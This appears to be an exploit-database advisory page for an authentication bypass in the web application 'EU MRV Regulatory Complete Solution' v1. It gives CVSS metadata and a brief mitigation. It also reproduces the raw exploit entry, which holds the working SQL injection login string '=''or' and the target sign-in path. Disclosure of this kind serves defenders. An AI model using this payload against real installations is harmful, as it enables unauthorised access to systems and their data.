header-logo
Suggest Exploit
vendor:
EU MRV Regulatory Complete Solution
by:
Veyselxan
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: EU MRV Regulatory Complete Solution
Affected Version From: v1
Affected Version To: v1
Patch Exists: NO
Related CWE: N/A
CPE: a:codecanyon:eu_mrv_regulatory_complete_solution
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows
2018

EU MRV Regulatory Complete Solution 1 – Authentication Bypass

An authentication bypass vulnerability exists in EU MRV Regulatory Complete Solution 1, which allows an attacker to bypass authentication by entering '=''or' as the username and password.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.
Source

Exploit-DB raw data:

# Exploit Title: EU MRV Regulatory Complete Solution 1 - Authentication Bypass
# Date: 2018-05-24
# Exploit Author: Veyselxan
# Vendor Homepage: https://codecanyon.net/item/eu-mrv-regulatory-complete-solution/21680923?s_rank=11
# Version: v1 (REQUIRED)
# Tested on: Windows

http://Target/projects/eumrv/app/#/access/signin

username: '=''or'

Password: '=''or'